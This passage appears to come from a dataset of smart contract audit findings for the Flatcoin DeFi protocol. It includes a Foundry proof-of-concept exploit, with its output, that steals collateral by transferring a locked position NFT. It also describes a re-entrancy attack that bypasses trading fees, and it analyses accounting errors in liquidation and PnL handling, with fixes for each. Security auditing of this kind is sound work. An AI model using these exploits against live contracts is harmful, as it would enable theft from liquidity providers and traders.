tokenId\\n delayedOrderProxy.announceLeverageClose(\\n tokenId,\\n minFillPrice - 100, // add some slippage\\n mockKeeperFee.getKeeperFee()\\n );\\n \\n // Announce limit order to lock tokenId\\n limitOrderProxy.announceLimitOrder({\\n tokenId: tokenId,\\n priceLowerThreshold: 900e18,\\n priceUpperThreshold: 1100e18\\n });\\n \\n // Cancel limit order to unlock tokenId\\n limitOrderProxy.cancelLimitOrder(tokenId);\\n \\n balance = WETH.balanceOf(alice);\\n console2.log(""alice after creating two orders"", balance);\\n\\n // TokenId is unlocked and can be transferred while the delayed order is active\\n leverageModProxy.transferFrom(alice, address(0x1), tokenId);\\n console2.log(""new owner of position NFT"", leverageModProxy.ownerOf(tokenId));\\n\\n balance = WETH.balanceOf(alice);\\n console2.log(""alice after transfering position NFT out e.g. selling"", balance);\\n\\n skip(uint256(vaultProxy.minExecutabilityAge())); // must reach minimum executability time\\n\\n uint256 oraclePrice = collateralPrice;\\n\\n bytes[] memory priceUpdateData = getPriceUpdateData(oraclePrice);\\n delayedOrderProxy.executeOrder{value: 1}(alice, priceUpdateData);\\n\\n uint256 finalBalance = WETH.balanceOf(alice);\\n console2.log(""alice after executing delayerd order and cashing out profit"", finalBalance);\\n console2.log(""profit"", finalBalance - balance);\\n}\\n```\\n\\nOutput\\n```\\nRunning 1 test for test/unit/Common/LimitOrder.t.sol:LimitOrderTest\\n[PASS] testExploitTransferOut() (gas: 743262)\\nLogs:\\n alice balance 99879997000000000000000\\n alice after creating two orders 99879997000000000000000\\n new owner of position NFT 0x0000000000000000000000000000000000000001\\n alice after transfering position NFT out e.g. selling 99879997000000000000000\\n alice after executing delayerd order and cashing out profit 99889997000000000000000\\n profit 10000000000000000000\\n\\nTest result: ok. 
1 passed; 0 failed; 0 skipped; finished in 50.06ms\\n\\nRan 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)\\n```\\n",It is recommended to prevent announcing order either through `DelayedOrder.announceLeverageClose` or `LimitOrder.announceLimitOrder` if the leveraged position is already locked.,"The attacker can sell the leveraged position with a close order opened, execute the order afterward, and steal the underlying collateral.","```\\nfunction testExploitTransferOut() public {\\n uint256 collateralPrice = 1000e8;\\n\\n vm.startPrank(alice);\\n\\n uint256 balance = WETH.balanceOf(alice);\\n console2.log(""alice balance"", balance);\\n \\n (uint256 minFillPrice, ) = oracleModProxy.getPrice();\\n\\n // Announce order through delayed orders to lock tokenId\\n delayedOrderProxy.announceLeverageClose(\\n tokenId,\\n minFillPrice - 100, // add some slippage\\n mockKeeperFee.getKeeperFee()\\n );\\n \\n // Announce limit order to lock tokenId\\n limitOrderProxy.announceLimitOrder({\\n tokenId: tokenId,\\n priceLowerThreshold: 900e18,\\n priceUpperThreshold: 1100e18\\n });\\n \\n // Cancel limit order to unlock tokenId\\n limitOrderProxy.cancelLimitOrder(tokenId);\\n \\n balance = WETH.balanceOf(alice);\\n console2.log(""alice after creating two orders"", balance);\\n\\n // TokenId is unlocked and can be transferred while the delayed order is active\\n leverageModProxy.transferFrom(alice, address(0x1), tokenId);\\n console2.log(""new owner of position NFT"", leverageModProxy.ownerOf(tokenId));\\n\\n balance = WETH.balanceOf(alice);\\n console2.log(""alice after transfering position NFT out e.g. 
selling"", balance);\\n\\n skip(uint256(vaultProxy.minExecutabilityAge())); // must reach minimum executability time\\n\\n uint256 oraclePrice = collateralPrice;\\n\\n bytes[] memory priceUpdateData = getPriceUpdateData(oraclePrice);\\n delayedOrderProxy.executeOrder{value: 1}(alice, priceUpdateData);\\n\\n uint256 finalBalance = WETH.balanceOf(alice);\\n console2.log(""alice after executing delayerd order and cashing out profit"", finalBalance);\\n console2.log(""profit"", finalBalance - balance);\\n}\\n```\\n" +A malicious user can bypass limit order trading fees via cross-function re-entrancy,high,"A malicious user can bypass limit order trading fees via cross-function re-entrancy, since `_safeMint` makes an external call to the user before updating state.\\nIn the `LeverageModule` contract, the `_mint` function calls `_safeMint`, which makes an external call `to` the receiver of the NFT (the `to` address).\\n\\nOnly after this external call, `vault.setPosition()` is called to create the new position in the vault's storage mapping. This means that an attacker can gain control of the execution while the state of `_positions[_tokenId]` in FlatcoinVault is not up-to-date.\\n\\nThis outdated state of `_positions[_tokenId]` can be exploited by an attacker once the external call has been made. They can re-enter `LimitOrder::announceLimitOrder()` and provide the tokenId that has just been minted. 
In that function, the trading fee is calculated as follows:\\n```\\nuint256 tradeFee = ILeverageModule(vault.moduleAddress(FlatcoinModuleKeys._LEVERAGE_MODULE_KEY)).getTradeFee(\\n vault.getPosition(tokenId).additionalSize\\n);\\n```\\n\\nHowever since the position has not been created yet (due to state being updated after an external call), this results in the `tradeFee` being 0 since `vault.getPosition(tokenId).additionalSize` returns the default value of a uint256 (0), and `tradeFee` = fee * size.\\nHence, when the limit order is executed, the trading fee (tradeFee) charged to the user will be `0`.\\nA user announces opening a leverage position, calling announceLeverageOpen() via a smart contract which implements `IERC721Receiver`.\\nOnce the keeper executes the order, the contract is called, with the function `onERC721Received(address,address,uint256,bytes)`\\nThe function calls `LimitOrder::announceLimitOrder()` to create the desired limit order to close the position. (stop loss, take profit levels)\\nThe contract then returns `msg.sig` (the function signature of the executing function) to satisfy the IERC721Receiver's requirement.\\nTo run this proof of concept:\\nAdd 2 files `AttackerContract.sol` and `ReentrancyPoC.t.sol` to `flatcoin-v1/test/unit` in the project's repo.\\nrun `forge test --mt test_tradingFeeBypass -vv` in the terminal\\n\\n\\n","To fix this specific issue, the following change is sufficient:\\n```\\n// Remove the line below\\n_newTokenId = _mint(_account); \\n\\nvault.setPosition( \\n FlatcoinStructs.Position({\\n lastPrice: entryPrice,\\n marginDeposited: announcedOpen.margin,\\n additionalSize: announcedOpen.additionalSize,\\n entryCumulativeFunding: vault.cumulativeFundingRate()\\n }),\\n// Remove the line below\\n _newTokenId\\n// Add the line below\\n tokenIdNext\\n);\\n// Add the line below\\n_newTokenId = _mint(_account); \\n```\\n\\nHowever there are still more state changes that would occur after the `_mint` function (potentially 
yielding other cross-function re-entrancy if the other contracts were changed) so the optimum solution would be to mint the NFT after all state changes have been executed, so the safest solution would be to move `_mint` all the way to the end of `LeverageModule::executeOpen()`.\\nOtherwise, if changing this order of operations is undesirable for whatever reason, one can implement the following check within `LimitOrder::announceLimitOrder()` to ensure that the `positions[_tokenId]` is not uninitialized:\\n```\\nuint256 tradeFee = ILeverageModule(vault.moduleAddress(FlatcoinModuleKeys._LEVERAGE_MODULE_KEY)).getTradeFee(\\n vault.getPosition(tokenId).additionalSize\\n);\\n\\n// Add the line below\\nrequire(additionalSize > 0, ""Additional Size of a position cannot be zero"");\\n```\\n","A malicious user can bypass the trading fees for a limit order, via cross-function re-entrancy. These trading fees were supposed to be paid to the LPs by increasing `stableCollateralTotal`, but due to limit orders being able to bypass trading fees (albeit during the same transaction as opening the position), LPs are now less incentivised to provide their liquidity to the protocol.",```\\nuint256 tradeFee = ILeverageModule(vault.moduleAddress(FlatcoinModuleKeys._LEVERAGE_MODULE_KEY)).getTradeFee(\\n vault.getPosition(tokenId).additionalSize\\n);\\n```\\n +Incorrect handling of PnL during liquidation,high,"The incorrect handling of PnL during liquidation led to an error in the protocol's accounting mechanism, which might result in various issues, such as the loss of assets and the stable collateral total being inflated.\\nFirst Example\\nAssume a long position with the following state:\\nMargin Deposited = +20\\nAccrued Funding = -100\\nProfit & Loss (PnL) = +100\\nLiquidation Margin = 30\\nLiquidation Fee = 25\\nSettled Margin = Margin Deposited + Accrued Funding + PnL = 20\\nLet the current `StableCollateralTotal` be $x$ and `marginDepositedTotal` be $y$ at the start of the 
liquidation.\\nFirstly, the `settleFundingFees()` function will be executed at the start of the liquidation process. The effect of the `settleFundingFees()` function is shown below. The long trader's `marginDepositedTotal` will be reduced by 100, while the LP's `stableCollateralTotal` will increase by 100.\\n```\\nsettleFundingFees() = Short/LP need to pay Long 100\\n\\nmarginDepositedTotal = marginDepositedTotal + funding fee\\nmarginDepositedTotal = y + (-100) = (y - 100)\\n\\nstableCollateralTotal = x + (-(-100)) = (x + 100)\\n```\\n\\nSince the position's settle margin is below the liquidation margin, the position will be liquidated.\\nAt Line 109, the condition `(settledMargin > 0)` will be evaluated as `True`. At Line 123:\\n```\\nif (uint256(settledMargin) > expectedLiquidationFee)\\nif (+20 > +25) => False\\nliquidatorFee = settledMargin\\nliquidatorFee = +20\\n```\\n\\nThe `liquidationFee` will be to +20 at Line 127 below. This basically means that all the remaining margin of 20 will be given to the liquidator, and there should be no remaining margin for the LPs.\\nAt Line 133 below, the `vault.updateStableCollateralTotal` function will be executed:\\n```\\nvault.updateStableCollateralTotal(remainingMargin - positionSummary.profitLoss);\\nvault.updateStableCollateralTotal(0 - (+100));\\nvault.updateStableCollateralTotal(-100);\\n\\nstableCollateralTotal = (x + 100) - 100 = x\\n```\\n\\nWhen `vault.updateStableCollateralTotal` is set to `-100`, `stableCollateralTotal` is equal to $x$.\\n```\\nFile: LiquidationModule.sol\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n..SNIP..\\n // Check that the total margin deposited by the long traders is not -ve.\\n // To get this amount, we will have to account for the PnL and funding fees accrued.\\n int256 settledMargin = positionSummary.marginAfterSettlement;\\n\\n uint256 liquidatorFee;\\n\\n // If the settled margin is greater than 0, send a 
portion (or all) of the margin to the liquidator and LPs.\\n if (settledMargin > 0) {\\n // Calculate the liquidation fees to be sent to the caller.\\n uint256 expectedLiquidationFee = PerpMath._liquidationFee(\\n position.additionalSize,\\n liquidationFeeRatio,\\n liquidationFeeLowerBound,\\n liquidationFeeUpperBound,\\n currentPrice\\n );\\n\\n uint256 remainingMargin;\\n\\n // Calculate the remaining margin after accounting for liquidation fees.\\n // If the settled margin is less than the liquidation fee, then the liquidator fee is the settled margin.\\n if (uint256(settledMargin) > expectedLiquidationFee) {\\n liquidatorFee = expectedLiquidationFee;\\n remainingMargin = uint256(settledMargin) - expectedLiquidationFee;\\n } else {\\n liquidatorFee = uint256(settledMargin);\\n }\\n\\n // Adjust the stable collateral total to account for user's remaining margin.\\n // If the remaining margin is greater than 0, this goes to the LPs.\\n // Note that {`remainingMargin` - `profitLoss`} is the same as {`marginDeposited` + `accruedFunding`}.\\n vault.updateStableCollateralTotal(int256(remainingMargin) - positionSummary.profitLoss);\\n\\n // Send the liquidator fee to the caller of the function.\\n // If the liquidation fee is greater than the remaining margin, then send the remaining margin.\\n vault.sendCollateral(msg.sender, liquidatorFee);\\n } else {\\n // If the settled margin is -ve then the LPs have to bear the cost.\\n // Adjust the stable collateral total to account for user's profit/loss and the negative margin.\\n // Note: We are adding `settledMargin` and `profitLoss` instead of subtracting because of their sign (which will be -ve).\\n vault.updateStableCollateralTotal(settledMargin - positionSummary.profitLoss);\\n }\\n```\\n\\nNext, the `vault.updateGlobalPositionData` function here will be executed.\\n```\\nvault.updateGlobalPositionData({marginDelta: -(position.marginDeposited + 
positionSummary.accruedFunding)})\\nvault.updateGlobalPositionData({marginDelta: -(20 + (-100))})\\nvault.updateGlobalPositionData({marginDelta: 80})\\n\\nprofitLossTotal = 100\\nnewMarginDepositedTotal = globalPositions.marginDepositedTotal + marginDelta + profitLossTotal\\nnewMarginDepositedTotal = (y - 100) + 80 + 100 = (y + 80)\\n\\nstableCollateralTotal = stableCollateralTotal + -PnL\\nstableCollateralTotal = x + (-100) = (x - 100)\\n```\\n\\nThe final `newMarginDepositedTotal` is $y + 80$ and `stableCollateralTotal` is $x -100$, which is incorrect. In this scenario\\nThere is no remaining margin for the LPs, as all the remaining margin has been sent to the liquidator as a fee. The remaining margin (settled margin) is also not negative. Thus, there should not be any loss on the `stableCollateralTotal`. The correct final `stableCollateralTotal` should be $x$.\\nThe final `newMarginDepositedTotal` is $y + 80$, which is incorrect as this indicates that the long trader's pool has gained 80 ETH, which should not be the case when a long position is being liquidated.\\nSecond Example\\nThe current price of rETH is $1000.\\nLet's say there is a user A (Alice) who makes a deposit of 5 rETH as collateral for LP.\\nLet's say another user, Bob (B), comes up, deposits 2 rETH as a margin, and creates a position with a size of 5 rETH, basically creating a perfectly hedged market. Since this is a perfectly hedged market, the accrued funding fee will be zero for the context of this example.\\nTotal collateral in the system = 5 rETH + 2 rETH = 7 rETH\\nAfter some time, the price of rETH drop to $500. 
As a result, Bob's position is liquidated as its settled margin is less than zero.\\n$$ settleMargin = 2\\ rETH + \\frac{5 \\times (500 - 1000)}{500} = 2\\ rETH - 5\\ rETH = -3\\ rETH $$\\nDuring the liquidation, the following code is executed to update the LP's stable collateral total:\\n```\\nvault.updateStableCollateralTotal(settledMargin - positionSummary.profitLoss);\\nvault.updateStableCollateralTotal(-3 rETH - (-5 rETH));\\nvault.updateStableCollateralTotal(+2);\\n```\\n\\nLP's stable collateral total increased by 2 rETH.\\nSubsequently, the `updateGlobalPositionData` function will be executed.\\n```\\nFile: LiquidationModule.sol\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n..SNIP..\\n vault.updateGlobalPositionData({\\n price: position.lastPrice,\\n marginDelta: -(int256(position.marginDeposited) + positionSummary.accruedFunding),\\n additionalSizeDelta: -int256(position.additionalSize) // Since position is being closed, additionalSizeDelta should be negative.\\n });\\n```\\n\\nWithin the `updateGlobalPositionData` function, the `profitLossTotal` at Line 179 will be -5 rETH. This means that the long trader (Bob) has lost 5 rETH.\\nAt Line 205 below, the PnL of the long traders (-5 rETH) will be transferred to the LP's stable collateral total. In this case, the LPs gain 5 rETH.\\nNote that the LP's stable collateral total has been increased by 2 rETH earlier and now we are increasing it by 5 rETH again. Thus, the total gain by LPs is 7 rETH. If we add 7 rETH to the original stable collateral total, it will be 7 rETH + 5 rETH = 12 rETH. 
However, this is incorrect because we only have 7 rETH collateral within the system, as shown at the start.\\n```\\nFile: FlatcoinVault.sol\\n function updateGlobalPositionData(\\n uint256 _price,\\n int256 _marginDelta,\\n int256 _additionalSizeDelta\\n ) external onlyAuthorizedModule {\\n // Get the total profit loss and update the margin deposited total.\\n int256 profitLossTotal = PerpMath._profitLossTotal({globalPosition: _globalPositions, price: _price});\\n\\n // Note that technically, even the funding fees should be accounted for when computing the margin deposited total.\\n // However, since the funding fees are settled at the same time as the global position data is updated,\\n // we can ignore the funding fees here.\\n int256 newMarginDepositedTotal = int256(_globalPositions.marginDepositedTotal) + _marginDelta + profitLossTotal;\\n\\n // Check that the sum of margin of all the leverage traders is not negative.\\n // Rounding errors shouldn't result in a negative margin deposited total given that\\n // we are rounding down the profit loss of the position.\\n // If anything, after closing the last position in the system, the `marginDepositedTotal` should can be positive.\\n // The margin may be negative if liquidations are not happening in a timely manner.\\n if (newMarginDepositedTotal < 0) {\\n revert FlatcoinErrors.InsufficientGlobalMargin();\\n }\\n\\n _globalPositions = FlatcoinStructs.GlobalPositions({\\n marginDepositedTotal: uint256(newMarginDepositedTotal),\\n sizeOpenedTotal: (int256(_globalPositions.sizeOpenedTotal) + _additionalSizeDelta).toUint256(),\\n lastPrice: _price\\n });\\n\\n // Profit loss of leverage traders has to be accounted for by adjusting the stable collateral total.\\n // Note that technically, even the funding fees should be accounted for when computing the stable collateral total.\\n // However, since the funding fees are settled at the same time as the global position data is updated,\\n // we can ignore the funding fees 
here\\n _updateStableCollateralTotal(-profitLossTotal);\\n }\\n```\\n\\nThird Example\\nAt $T0$, the marginDepositedTotal = 70 ETH, stableCollateralTotal = 100 ETH, vault's balance = 170 ETH\\nBob's Long Position Alice (LP)\\nMargin = 70 ETH\\nPosition Size = 500 ETH\\nLeverage = (500 + 20) / 20 = 26x\\nLiquidation Fee = 50 ETH\\nLiquidation Margin = 60 ETH\\nEntry Price = $1000 per ETH Deposited = 100 ETH\\nAt $T1$, the position's settled margin falls to 60 ETH (margin = +70, accrued fee = -5, PnL = -5) and is subjected to liquidation.\\nFirstly, the `settleFundingFees()` function will be executed at the start of the liquidation process. The effect of the `settleFundingFees()` function is shown below. The long trader's `marginDepositedTotal` will be reduced by 5, while the LP's `stableCollateralTotal` will increase by 5.\\n```\\nsettleFundingFees() = Long need to pay short 5\\n\\nmarginDepositedTotal = marginDepositedTotal + funding fee\\nmarginDepositedTotal = 70 + (-5) = 65\\n\\nstableCollateralTotal = 100 + (-(-5)) = 105\\n```\\n\\nNext, this part of the code will be executed to send a portion of the liquidated position's margin to the liquidator and LPs.\\n```\\nsettledMargin > 0 => True\\n(settledMargin > expectedLiquidationFee) => (+60 > +50) => True\\nremainingMargin = uint256(settledMargin) - expectedLiquidationFee = 60 - 50 = 10\\n```\\n\\n50 ETH will be sent to the liquidator and the remaining 10 ETH should goes to the LPs.\\n```\\nvault.updateStableCollateralTotal(remainingMargin - positionSummary.profitLoss) =>\\nstableCollateralTotal = 105 ETH + (remaining margin - PnL)\\nstableCollateralTotal = 105 ETH + (10 ETH - (-5 ETH))\\nstableCollateralTotal = 105 ETH + (15 ETH) = 120 ETH\\n```\\n\\nNext, the `vault.updateGlobalPositionData` function here will be executed.\\n```\\nvault.updateGlobalPositionData({marginDelta: -(position.marginDeposited + positionSummary.accruedFunding)})\\nvault.updateGlobalPositionData({marginDelta: -(70 + 
(-5))})\\nvault.updateGlobalPositionData({marginDelta: -65})\\n\\nprofitLossTotal = -5\\nnewMarginDepositedTotal = globalPositions.marginDepositedTotal + marginDelta + profitLossTotal\\nnewMarginDepositedTotal = 70 + (-65) + (-5) = 0\\n\\nstableCollateralTotal = stableCollateralTotal + -PnL\\nstableCollateralTotal = 120 + (-(5)) = 125\\n```\\n\\nThe reason why the profitLossTotal = -5 is because there is only one (1) position in the system. So, this loss actually comes from the loss of Bob's position.\\nThe `newMarginDepositedTotal = 0` is correct. This is because the system only has 1 position, which is Bob's position; once the position is liquidated, there should be no margin deposited left in the system.\\nHowever, `stableCollateralTotal = 125` is incorrect. Because the vault's collateral balance now is 170 - 50 (send to liquidator) = 120. Thus, the tracked balance and actual collateral balance are not in sync.","To remediate the issue, the `profitLossTotal` should be excluded within the `updateGlobalPositionData` function during liquidation.\\n```\\n// Remove the line below\\n profitLossTotal = PerpMath._profitLossTotal(// rest of code)\\n\\n// Remove the line below\\n newMarginDepositedTotal = globalPositions.marginDepositedTotal // Add the line below\\n _marginDelta // Add the line below\\n profitLossTotal\\n// Add the line below\\n newMarginDepositedTotal = globalPositions.marginDepositedTotal // Add the line below\\n _marginDelta\\n\\nif (newMarginDepositedTotal < 0) {\\n revert FlatcoinErrors.InsufficientGlobalMargin();\\n}\\n\\n_globalPositions = FlatcoinStructs.GlobalPositions({\\n marginDepositedTotal: uint256(newMarginDepositedTotal),\\n sizeOpenedTotal: (int256(_globalPositions.sizeOpenedTotal) // Add the line below\\n _additionalSizeDelta).toUint256(),\\n lastPrice: _price\\n});\\n \\n// Remove the line below\\n _updateStableCollateralTotal(// Remove the line below\\nprofitLossTotal);\\n```\\n\\nThe existing `updateGlobalPositionData` function still 
needs to be used for other functions besides liquidation. As such, consider creating a separate new function (e.g., updateGlobalPositionDataDuringLiquidation) solely for use during the liquidation that includes the above fixes.\\nThe following attempts to apply the above fix to the three (3) examples described in the report to verify that it is working as intended.\\nFirst Example\\nLet the current `StableCollateralTotal` be $x$ and `marginDepositedTotal` be $y$ at the start of the liquidation.\\nDuring funding settlement:\\nStableCollateralTotal = $x$ + 100\\nmarginDepositedTotal = $y$ - 100\\nDuring updateStableCollateralTotal:\\n```\\nvault.updateStableCollateralTotal(int256(remainingMargin) - positionSummary.profitLoss);\\nvault.updateStableCollateralTotal(0 - (+100));\\nvault.updateStableCollateralTotal(-100);\\n```\\n\\nStableCollateralTotal = ($x$ + 100) - 100 = $x$\\nDuring Global Position Update:\\nmarginDelta = -(position.marginDeposited + positionSummary.accruedFunding) = -(20 + (-100)) = 80\\nnewMarginDepositedTotal = marginDepositedTotal + marginDelta = ($y$ - 100) + 80 = ($y$ - 20)\\nNo change to StableCollateralTotal here. Remain at $x$\\nConclusion:\\nThe LPs should not gain or lose in this scenario. Thus, the fact that the StableCollateralTotal remains as $x$ before and after the liquidation is correct.\\nThe `marginDepositedTotal` is ($y$ - 20) is correct because the liquidated position's remaining margin is 20 ETH. 
Thus, when this position is liquidated, 20 ETH should be deducted from the `marginDepositedTotal`\\nNo revert during the execution.\\nSecond Example\\nDuring updateStableCollateralTotal:\\n```\\nvault.updateStableCollateralTotal(settledMargin - positionSummary.profitLoss);\\nvault.updateStableCollateralTotal(-3 rETH - (-5 rETH));\\nvault.updateStableCollateralTotal(+2);\\n```\\n\\nStableCollateralTotal = 5 + 2 = 7 ETH\\nDuring Global Position Update:\\nmarginDelta = -(position.marginDeposited + positionSummary.accruedFunding) = -(2 + 0) = -2\\nmarginDepositedTotal = marginDepositedTotal + marginDelta = 2 + (-2) = 0\\nConclusion:\\nStableCollateralTotal = 7 ETH, marginDepositedTotal = 0 (Total 7 ETH tracked in the system)\\nBalance of collateral in the system = 7 ETH. Thus, both values are in sync. No revert.\\nThird Example\\nDuring funding settlement (Transfer 5 from Long to LP):\\nmarginDepositedTotal = 70 + (-5) = 65\\nStableCollateralTotal = 100 + 5 = 105\\nTransfer fee to Liquidator\\n50 ETH sent to the liquidator from the system: Balance of collateral in the system = 170 ETH - 50 ETH = 120 ETH\\nDuring updateStableCollateralTotal:\\n```\\nvault.updateStableCollateralTotal(remainingMargin - positionSummary.profitLoss) =>\\nstableCollateralTotal = 105 ETH + (remaining margin - PnL)\\nstableCollateralTotal = 105 ETH + (10 ETH - (-5 ETH))\\nstableCollateralTotal = 105 ETH + (15 ETH) = 120 ETH\\n```\\n\\nStableCollateralTotal = 120 ETH\\nDuring Global Position Update:\\nmarginDelta= -(position.marginDeposited + positionSummary.accruedFunding) = -(70 + (-5)) = -65\\nmarginDepositedTotal = 65 + (-65) = 0\\nConclusion:\\nStableCollateralTotal = 120 ETH, marginDepositedTotal = 0 (Total 120 ETH tracked in the system)\\nBalance of collateral in the system = 120 ETH. Thus, both values are in sync. 
No revert.","The following is a list of potential impacts of this issue:\\nFirst Example: LPs incur unnecessary losses during liquidation, which would be avoidable if the calculations were correctly implemented from the start.\\nSecond Example: An error in the protocol's accounting mechanism led to an inflated increase in the LPs' stable collateral total, which in turn inflated the number of tokens users can withdraw from the system.\\nThird Example: The accounting error led to the tracked balance and actual collateral balance not being in sync.",```\\nsettleFundingFees() = Short/LP need to pay Long 100\\n\\nmarginDepositedTotal = marginDepositedTotal + funding fee\\nmarginDepositedTotal = y + (-100) = (y - 100)\\n\\nstableCollateralTotal = x + (-(-100)) = (x + 100)\\n```\\n +Asymmetry in profit and loss (PnL) calculations,high,"An asymmetry arises in profit and loss (PnL) calculations due to relative price changes. This discrepancy emerges when adjustments to a position lead to differing PnL outcomes despite equivalent absolute price shifts in rETH, leading to loss of assets.\\nScenario 1\\nAssume at $T0$, the price of rETH is $1000. Bob opened a long position with the following state:\\nPosition Size = 40 ETH\\nMargin = $x$ ETH\\nAt $T2$, the price of rETH increased to $2000. Thus, Bob's PnL is as follows: he gains 20 rETH.\\n```\\nPnL = Position Size * Price Shift / Current Price\\nPnL = Position Size * (Current Price - Last Price) / Current Price\\nPnL = 40 rETH * ($2000 - $1000) / $2000\\nPnL = $40000 / $2000 = 20 rETH\\n```\\n\\nImportant Note: In terms of dollars, each ETH earns $1000. Since the position held 40 ETH, the position gained $40000.\\nScenario 2\\nAssume at $T0$, the price of rETH is $1000. Bob opened a long position with the following state:\\nPosition Size = 40 ETH\\nMargin = $x$ ETH\\nAt $T1$, the price of rETH dropped to $500. 
An adjustment is executed against Bob's long position, and a `newMargin` is computed to account for the PnL accrued till now, as shown in Line 191 below. Thus, Bob's PnL is as follows: he lost 40 rETH.\\n```\\nPnL = Position Size * Price Shift / Current Price\\nPnL = Position Size * (Current Price - Last Price) / Current Price\\nPnL = 40 rETH * ($500 - $1000) / $500\\nPnL = -$20000 / $500 = -40 rETH\\n```\\n\\nAt this point, the position's `marginDeposited` will be $(x - 40)\\ rETH$ and `lastPrice` set to $500.\\nImportant Note 1: In terms of dollars, each ETH lost $500. Since the position held 40 ETH, the position lost $20000\\n```\\nFile: LeverageModule.sol\\n // This accounts for the profit loss and funding fees accrued till now.\\n uint256 newMargin = (marginAdjustment +\\n PerpMath\\n ._getPositionSummary({position: position, nextFundingEntry: cumulativeFunding, price: adjustPrice})\\n .marginAfterSettlement).toUint256();\\n..SNIP..\\n vault.setPosition(\\n FlatcoinStructs.Position({\\n lastPrice: adjustPrice,\\n marginDeposited: newMargin,\\n additionalSize: newAdditionalSize,\\n entryCumulativeFunding: cumulativeFunding\\n }),\\n announcedAdjust.tokenId\\n );\\n```\\n\\nAt $T2$, the price of rETH increases from $500 to $2000. Thus, Bob's PnL is as follows:\\n```\\nPnL = Position Size * Price Shift / Current Price\\nPnL = Position Size * (Current Price - Last Price) / Current Price\\nPnL = 40 rETH * ($2000 - $500) / $500\\nPnL = $60000 / $2000 = 30 rETH\\n```\\n\\nAt this point, the position's `marginDeposited` will be $(x - 40 + 30)\\ rETH$, which is equal to $(x - 10)\\ rETH$. This effectively means that Bob has lost 10 rETH of the total margin he deposited.\\nImportant Note 2: In terms of dollars, each ETH gains $1500. 
Since the position held 40 ETH, the position gained $60000.\\nImportant Note 3: If we add up the loss of $20000 at $T1$ and the gain of $60000 at $T2$, the overall PnL is a gain of $40000 at the end.\\nAnalysis\\nThe final PnL of a position should be equivalent regardless of the number of adjustments/position updates made between $T0$ and $T2$. However, the current implementation does not conform to this property. Bob gains 20 rETH in the first scenario, while Bob loses 10 rETH in the second scenario.\\nThere are several reasons that lead to this issue:\\nThe PnL calculation emphasizes relative price changes (percentage) rather than absolute price changes (dollar value). This leads to asymmetric rETH outcomes for the same absolute dollar gains/losses. If we had used the dollar value to compute the PnL, both scenarios would return the same correct result, with a gain of $40000 at the end, as shown in the examples above. (Refer to the important note above)\\nThe formula for PnL calculation is sensitive to the proportion of the price change relative to the current price. This causes the rETH gains/losses to be non-linear even when the absolute dollar gains/losses are the same.\\nExtra Example\\nThe current approach to computing the PnL will also cause issues in another area besides the one shown above. The following example aims to demonstrate that it can cause a desync between the PnL accumulated by the global positions AND the PnL of all the individual open positions in the system.\\nThe following shows the two open positions owned by Alice and Bob. The current price of ETH is $1000 and the current time is $T0$\\nAlice's Long Position Bob's Long Position\\nPosition Size = 100 ETH\\nEntry Price = $1000 Position Size = 50 ETH\\nEntry Price = $1000\\nAt $T1$, the price of ETH drops from $1000 to $750, and the `updateGlobalPositionData` function is executed. The `profitLossTotal` is computed as below. 
Thus, the `marginDepositedTotal` decreased by 50 ETH.\\n```\\npriceShift = $750 - $1000 = -$250\\nprofitLossTotal = (globalPosition.sizeOpenedTotal * priceShift) / price\\nprofitLossTotal = (150 ETH * -$250) / $750 = -50 ETH\\n```\\n\\nAt $T2$, the price of ETH drops from $750 to $500, and the `updateGlobalPositionData` function is executed. The `profitLossTotal` is computed as below. Thus, the `marginDepositedTotal` decreased by 75 ETH.\\n```\\npriceShift = $500 - $750 = -$250\\nprofitLossTotal = (globalPosition.sizeOpenedTotal * priceShift) / price\\nprofitLossTotal = (150 ETH * -$250) / $500 = -75 ETH\\n```\\n\\nIn total, the `marginDepositedTotal` decreased by 125 ETH (50 + 75), which means that the long traders lost 125 ETH from $T0$ to $T2$.\\nHowever, when we compute the loss of Alice and Bob's positions at $T2$, they lost a total of 150 ETH, which deviated from the loss of 125 ETH in the global position data.\\n```\\nAlice's PNL\\npriceShift = current price - entry price = $500 - $1000 = -$500\\nPnL = (position size * priceShift) / current price\\nPnL = (100 ETH * -$500) / $500 = -100 ETH\\n\\nBob's PNL\\npriceShift = current price - entry price = $500 - $1000 = -$500\\nPnL = (position size * priceShift) / current price\\nPnL = (50 ETH * -$500) / $500 = -50 ETH\\n```\\n","Consider tracking the PnL in dollar value/term to ensure consistency between the rETH and dollar representations of gains and losses.\\nAppendix\\nCompared to SNX V2, it is not vulnerable to this issue. The reason is that in SNX V2 when it computes the PnL, it does not ""scale"" down the result by the price. 
The PnL in SNXv2 is simply computed in dollar value ($positionSize \\times priceShift$), while FlatCoin protocol computes in collateral (rETH) term ($\\frac{positionSize \\times priceShift}{price}$).\\n```\\nfunction _profitLoss(Position memory position, uint price) internal pure returns (int pnl) {\\n int priceShift = int(price).sub(int(position.lastPrice));\\n return int(position.size).multiplyDecimal(priceShift);\\n}\\n```\\n\\n```\\n/*\\n * The initial margin of a position, plus any PnL and funding it has accrued. The resulting value may be negative.\\n */\\nfunction _marginPlusProfitFunding(Position memory position, uint price) internal view returns (int) {\\n int funding = _accruedFunding(position, price);\\n return int(position.margin).add(_profitLoss(position, price)).add(funding);\\n}\\n```\\n","Loss of assets, as demonstrated in the second scenario in the first example above. The tracking of profit and loss, which is the key component within the protocol, both on the position level and global level, is broken.",```\\nPnL = Position Size * Price Shift / Current Price\\nPnL = Position Size * (Current Price - Last Price) / Current Price\\nPnL = 40 rETH * ($2000 - $1000) / $2000\\nPnL = $40000 / $2000 = 20 rETH\\n```\\n +Incorrect price used when updating the global position data,high,"Incorrect price used when updating the global position data leading to a loss of assets for LPs.\\nNear the end of the liquidation process, the `updateGlobalPositionData` function at Line 159 will be executed to update the global position data. However, when executing the `updateGlobalPositionData` function, the code sets the price at Line 160 below to the position's last price (position.lastPrice), which is incorrect. 
